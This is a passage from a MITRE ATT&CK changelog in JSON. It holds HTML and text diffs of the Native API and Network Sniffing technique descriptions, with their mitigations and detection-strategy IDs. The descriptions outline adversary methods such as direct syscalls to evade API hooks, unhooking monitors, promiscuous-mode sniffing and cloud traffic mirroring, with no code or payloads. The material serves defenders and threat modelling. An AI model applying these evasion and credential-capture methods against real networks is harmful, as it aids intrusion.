nowrap=\"nowrap\">exposed&nbsp;to&nbsp;user-mode&nbsp;applications&nbsp;via&nbsp;interfaces&nbsp;and&nbsp;librari</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es.(Citation:&nbsp;OutFlank&nbsp;System&nbsp;Calls)(Citation:&nbsp;CyberBit&nbsp;Syst</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es.(Citation:&nbsp;OutFlank&nbsp;System&nbsp;Calls)(Citation:&nbsp;CyberBit&nbsp;Syst</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">em&nbsp;Calls)(Citation:&nbsp;MDSec&nbsp;System&nbsp;Calls)&nbsp;For&nbsp;example,&nbsp;functio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">em&nbsp;Calls)(Citation:&nbsp;MDSec&nbsp;System&nbsp;Calls)&nbsp;For&nbsp;example,&nbsp;functio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ns&nbsp;such&nbsp;as&nbsp;the&nbsp;Windows&nbsp;API&nbsp;&lt;code&gt;CreateProcess()&lt;/code&gt;&nbsp;or&nbsp;G</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ns&nbsp;such&nbsp;as&nbsp;the&nbsp;Windows&nbsp;API&nbsp;&lt;code&gt;CreateProcess()&lt;/code&gt;&nbsp;or&nbsp;G</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">NU&nbsp;&lt;code&gt;fork()&lt;/code&gt;&nbsp;will&nbsp;allow&nbsp;programs&nbsp;and&nbsp;scripts&nbsp;to&nbsp;st</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">NU&nbsp;&lt;code&gt;fork()&lt;/code&gt;&nbsp;will&nbsp;allow&nbsp;programs&nbsp;and&nbsp;scripts&nbsp;to&nbsp;st</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">art&nbsp;other&nbsp;processes.(Citation:&nbsp;Microsoft&nbsp;CreateProcess)(Cita</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">art&nbsp;other&nbsp;processes.(Citation:&nbsp;Microsoft&nbsp;CreateProcess)(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;GNU&nbsp;Fork)&nbsp;This&nbsp;may&nbsp;allow&nbsp;API&nbsp;callers&nbsp;to&nbsp;execute&nbsp;a&nbsp;bina</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;GNU&nbsp;Fork)&nbsp;This&nbsp;may&nbsp;allow&nbsp;API&nbsp;callers&nbsp;to&nbsp;execute&nbsp;a&nbsp;bina</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry,&nbsp;run&nbsp;a&nbsp;CLI&nbsp;command,&nbsp;load&nbsp;modules,&nbsp;etc.&nbsp;as&nbsp;thousands&nbsp;of&nbsp;si</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry,&nbsp;run&nbsp;a&nbsp;CLI&nbsp;command,&nbsp;load&nbsp;modules,&nbsp;etc.&nbsp;as&nbsp;thousands&nbsp;of&nbsp;si</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">milar&nbsp;API&nbsp;functions&nbsp;exist&nbsp;for&nbsp;various&nbsp;system&nbsp;operations.(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">milar&nbsp;API&nbsp;functions&nbsp;exist&nbsp;for&nbsp;various&nbsp;system&nbsp;operations.(Cit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Microsoft&nbsp;Win32)(Citation:&nbsp;LIBC)(Citation:&nbsp;GLIBC)&nbsp;&nbsp;Hi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Microsoft&nbsp;Win32)(Citation:&nbsp;LIBC)(Citation:&nbsp;GLIBC)&nbsp;&nbsp;Hi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gher&nbsp;level&nbsp;software&nbsp;frameworks,&nbsp;such&nbsp;as&nbsp;Microsoft&nbsp;.NET&nbsp;and&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gher&nbsp;level&nbsp;software&nbsp;frameworks,&nbsp;such&nbsp;as&nbsp;Microsoft&nbsp;.NET&nbsp;and&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">acOS&nbsp;Cocoa,&nbsp;are&nbsp;also&nbsp;available&nbsp;to&nbsp;interact&nbsp;with&nbsp;native&nbsp;APIs.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">acOS&nbsp;Cocoa,&nbsp;are&nbsp;also&nbsp;available&nbsp;to&nbsp;interact&nbsp;with&nbsp;native&nbsp;APIs.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;These&nbsp;frameworks&nbsp;typically&nbsp;provide&nbsp;language&nbsp;wrappers/abstra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;These&nbsp;frameworks&nbsp;typically&nbsp;provide&nbsp;language&nbsp;wrappers/abstra</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ctions&nbsp;to&nbsp;API&nbsp;functionalities&nbsp;and&nbsp;are&nbsp;designed&nbsp;for&nbsp;ease-of-u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ctions&nbsp;to&nbsp;API&nbsp;functionalities&nbsp;and&nbsp;are&nbsp;designed&nbsp;for&nbsp;ease-of-u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se/portability&nbsp;of&nbsp;code.(Citation:&nbsp;Microsoft&nbsp;NET)(Citation:&nbsp;A</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se/portability&nbsp;of&nbsp;code.(Citation:&nbsp;Microsoft&nbsp;NET)(Citation:&nbsp;A</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pple&nbsp;Core&nbsp;Services)(Citation:&nbsp;MACOS&nbsp;Cocoa)(Citation:&nbsp;macOS&nbsp;F</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pple&nbsp;Core&nbsp;Services)(Citation:&nbsp;MACOS&nbsp;Cocoa)(Citation:&nbsp;macOS&nbsp;F</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oundation)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;assembly&nbsp;to&nbsp;directly&nbsp;or&nbsp;in-d</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oundation)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;assembly&nbsp;to&nbsp;directly&nbsp;or&nbsp;in-d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">irectly&nbsp;invoke&nbsp;syscalls&nbsp;in&nbsp;an&nbsp;attempt&nbsp;to&nbsp;subvert&nbsp;defensive&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">irectly&nbsp;invoke&nbsp;syscalls&nbsp;in&nbsp;an&nbsp;attempt&nbsp;to&nbsp;subvert&nbsp;defensive&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ensors&nbsp;and&nbsp;detection&nbsp;signatures&nbsp;such&nbsp;as&nbsp;user&nbsp;mode&nbsp;API-hooks.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ensors&nbsp;and&nbsp;detection&nbsp;signatures&nbsp;such&nbsp;as&nbsp;user&nbsp;mode&nbsp;API-hooks.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Redops&nbsp;Syscalls)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;attempt&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Redops&nbsp;Syscalls)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;attempt&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tamper&nbsp;with&nbsp;sensors&nbsp;and&nbsp;defensive&nbsp;tools&nbsp;associated&nbsp;with&nbsp;API&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tamper&nbsp;with&nbsp;sensors&nbsp;and&nbsp;defensive&nbsp;tools&nbsp;associated&nbsp;with&nbsp;API&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">monitoring,&nbsp;such&nbsp;as&nbsp;unhooking&nbsp;monitored&nbsp;functions&nbsp;via&nbsp;[Disab</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">monitoring,&nbsp;such&nbsp;as&nbsp;unhooking&nbsp;monitored&nbsp;functions&nbsp;via&nbsp;[Disab</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;or&nbsp;Modify&nbsp;Tools](https://attack.mitre.org/techniques/T15<span class=\"diff_sub\">6</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;or&nbsp;Modify&nbsp;Tools](https://attack.mitre.org/techniques/T1<span class=\"diff_add\">68</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">2/001</span>).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\"></span>5).</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0529: Behavioral Detection of Native API Invocation via Unusual DLL Loads and Direct Syscalls"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:41.399000+00:00",
                    "modified": "2025-10-24 17:48:36.910000+00:00",
                    "name": "Network Sniffing",
                    "description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Stealth](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1040",
                            "external_id": "T1040"
                        },
                        {
                            "source_name": "AWS Traffic Mirroring",
                            "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.",
                            "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html"
                        },
                        {
                            "source_name": "capture_embedded_packet_on_software",
                            "description": "Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.",
                            "url": "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html"
                        },
                        {
                            "source_name": "GCP Packet Mirroring",
                            "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.",
                            "url": "https://cloud.google.com/vpc/docs/packet-mirroring"
                        },
                        {
                            "source_name": "SpecterOps AWS Traffic Mirroring",
                            "description": "Luke Paine. (2020, March 11). Through the Looking Glass \u2014 Part 1. Retrieved March 17, 2022.",
                            "url": "https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512"
                        },
                        {
                            "source_name": "Azure Virtual Network TAP",
                            "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.",
                            "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview"
                        },
                        {
                            "source_name": "Rhino Security Labs AWS VPC Traffic Mirroring",
                            "description": "Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.",
                            "url": "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/"
                        },
                        {
                            "source_name": "US-CERT-TA18-106A",
                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Oleg Kolesnikov, Securonix",
                        "Tiago Faria, 3CORESec",
                        "Austin Clark, @c2defense",
                        "Itamar Mizrahi, Cymptom",
                        "Eliraz Levi, Hunters"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.7",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['description']\": {\"new_value\": \"Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\\n\\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\\n\\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Stealth](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\\n\\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\\n\\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)\", \"old_value\": \"Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\\n\\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\\n\\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\\n\\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\\n\\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)\", \"diff\": \"--- \\n+++ \\n@@ -1,8 +1,8 @@\\n Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\\n \\n-Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\\n+Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\\n \\n-Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\\n+Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Stealth](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\\n \\n In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\\n \"}}}",
                    "previous_version": "1.7",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to29__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to29__0\"><a href=\"#difflib_chg_to29__top\">t</a></td><td class=\"diff_header\" id=\"from29_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;passively&nbsp;sniff&nbsp;network&nbsp;traffic&nbsp;to&nbsp;capture&nbsp;i</td><td class=\"diff_next\"><a href=\"#difflib_chg_to29__top\">t</a></td><td class=\"diff_header\" id=\"to29_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;passively&nbsp;sniff&nbsp;network&nbsp;traffic&nbsp;to&nbsp;capture&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nformation&nbsp;about&nbsp;an&nbsp;environment,&nbsp;including&nbsp;authentication&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nformation&nbsp;about&nbsp;an&nbsp;environment,&nbsp;including&nbsp;authentication&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">terial&nbsp;passed&nbsp;over&nbsp;the&nbsp;network.&nbsp;Network&nbsp;sniffing&nbsp;refers&nbsp;to&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">terial&nbsp;passed&nbsp;over&nbsp;the&nbsp;network.&nbsp;Network&nbsp;sniffing&nbsp;refers&nbsp;to&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sing&nbsp;the&nbsp;network&nbsp;interface&nbsp;on&nbsp;a&nbsp;system&nbsp;to&nbsp;monitor&nbsp;or&nbsp;capture</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sing&nbsp;the&nbsp;network&nbsp;interface&nbsp;on&nbsp;a&nbsp;system&nbsp;to&nbsp;monitor&nbsp;or&nbsp;capture</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;information&nbsp;sent&nbsp;over&nbsp;a&nbsp;wired&nbsp;or&nbsp;wireless&nbsp;connection.&nbsp;An&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;information&nbsp;sent&nbsp;over&nbsp;a&nbsp;wired&nbsp;or&nbsp;wireless&nbsp;connection.&nbsp;An&nbsp;ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versary&nbsp;may&nbsp;place&nbsp;a&nbsp;network&nbsp;interface&nbsp;into&nbsp;promiscuous&nbsp;mode&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versary&nbsp;may&nbsp;place&nbsp;a&nbsp;network&nbsp;interface&nbsp;into&nbsp;promiscuous&nbsp;mode&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;passively&nbsp;access&nbsp;data&nbsp;in&nbsp;transit&nbsp;over&nbsp;the&nbsp;network,&nbsp;or&nbsp;use</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;passively&nbsp;access&nbsp;data&nbsp;in&nbsp;transit&nbsp;over&nbsp;the&nbsp;network,&nbsp;or&nbsp;use</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;span&nbsp;ports&nbsp;to&nbsp;capture&nbsp;a&nbsp;larger&nbsp;amount&nbsp;of&nbsp;data.&nbsp;&nbsp;Data&nbsp;captur</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;span&nbsp;ports&nbsp;to&nbsp;capture&nbsp;a&nbsp;larger&nbsp;amount&nbsp;of&nbsp;data.&nbsp;&nbsp;Data&nbsp;captur</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;via&nbsp;this&nbsp;technique&nbsp;may&nbsp;include&nbsp;user&nbsp;credentials,&nbsp;especial</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;via&nbsp;this&nbsp;technique&nbsp;may&nbsp;include&nbsp;user&nbsp;credentials,&nbsp;especial</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ly&nbsp;those&nbsp;sent&nbsp;over&nbsp;an&nbsp;insecure,&nbsp;unencrypted&nbsp;protocol.&nbsp;Techni</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ly&nbsp;those&nbsp;sent&nbsp;over&nbsp;an&nbsp;insecure,&nbsp;unencrypted&nbsp;protocol.&nbsp;Techni</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques&nbsp;for&nbsp;name&nbsp;service&nbsp;resolution&nbsp;poisoning,&nbsp;such&nbsp;as&nbsp;[<span class=\"diff_sub\">LLM</span>NR<span class=\"diff_chg\">/N</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques&nbsp;for&nbsp;name&nbsp;service&nbsp;resolution&nbsp;poisoning,&nbsp;such&nbsp;as&nbsp;[N<span class=\"diff_add\">ame&nbsp;</span>R<span class=\"diff_chg\">e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">BT-NS</span>&nbsp;Poisoning&nbsp;and&nbsp;SMB&nbsp;Relay](https://attack.mitre.org/tech</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">solution</span>&nbsp;Poisoning&nbsp;and&nbsp;SMB&nbsp;Relay](https://attack.mitre.org/t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T1557/001),&nbsp;can&nbsp;also&nbsp;be&nbsp;used&nbsp;to&nbsp;capture&nbsp;credentials&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 